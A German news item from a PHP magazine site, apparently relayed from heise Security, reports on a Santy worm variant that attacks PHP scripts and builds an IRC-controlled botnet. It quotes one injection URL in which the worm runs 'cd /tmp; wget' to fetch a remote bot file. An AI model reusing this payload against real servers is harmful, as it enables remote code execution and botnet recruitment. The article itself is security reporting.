1. PHP Magazin
  2. Software & Web-Development
  3. Wurm attackiert PHP-Skripte

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Erfahrungen

Es sind noch keine Kommentare vorhanden.

Hier Kannst Du einen Kommentar verfassen


Bitte gib mindestens 10 Zeichen ein.
Wird geladen... Bitte warte.
* Pflichtangabe

Verwandte Beiträge

PHP 5.0 kommt

Seit gestern, dem 29.06.03 ist der erste Beta Release von PHP 5.0 zum Download freigegeben. PHP 5 wird die Zend Engine 2 unterstützen, der XML Support wurde komplett erneuert und SQLite kommt nun zusammen mit PHP. Weitere Neuheiten finden Sie auf der S ...

admin

Autor : admin
Kategorie: Software & Web-Development

IE-Toolbar für Web-Designer

Microsofts Toolbar will Webseitengestaltern die Arbeit erleichtern. Speziell für Web-Designer hat Microsoft eine Toolbar für den Internet Explorer erarbeitet, die bei der Entwicklung von Webseiten helfen soll. Dazu lassen sich einzelne Bereiche einer Seit ...

admin

Autor : admin
Kategorie: Software & Web-Development

Neue PHP Versionen

Die freie Webskriptsprache PHP ist in neuen Versionen erhältlich. PHP 4.3.11 umfasst über 70 Bugfixes, die sich seit der letzten Version angesammelt hatten -- darunter Sicherheitslücken unter anderem in der Verarbeitung von Bilddateien und bei der Ansteue ...

admin

Autor : admin
Kategorie: Software & Web-Development

Windows XP: Neue Version nicht für PCs vorgesehen

Heute hat Microsoft eine spezielle und neue Version von Windows XP angekündigt. Diese Version soll zum Beispiel zur Anwendung in Registrierkassen oder Set-Top Boxen der PayTV-Anbieter kommen. Diese neue Version, hauptsächlich auf der XP-Grundversion ...

admin

Autor : admin
Kategorie: Software & Web-Development

PHP 4.3.5RC1 veröffentlicht

PHP 4.3.5RC1 wurde zum Testen freigegeben. Dies ist der erste Release Kandidat und sollte eine sehr kleine Anzahl von Problemen und Bugs haben. Nichts desto trotz, sollte diese Version nur zum Testen von realen Applikationen verwendet werden, um weitere P ...

admin

Autor : admin
Kategorie: Software & Web-Development

PHP World Kongress – 24. – 25. November 2009 Konferenzzentrum München

Unsere Mitglieder erhalten einen Rabatt von € 100,- Ferner verlosen wir eine Freikarte! ...

admin

Autor : admin
Kategorie: Software & Web-Development

Magazin & Tutorials
ebiz-consult GmbH & Co. KG
Wir entwickeln seit über 20 Jahren Web & E-Commerce Anwendungen
Egelsbach, Deutschland

Pressemitteilung veröffentlichen

pressemitteilung veröffentlichen

Teile Deine News und Informationen mit anderen

Du möchtest andere User über ein interessantes IT-Thema informieren, dann melde Dich jetzt an und teile es mit unserer PHP-Community

mehr erfahren

Angebot eintragen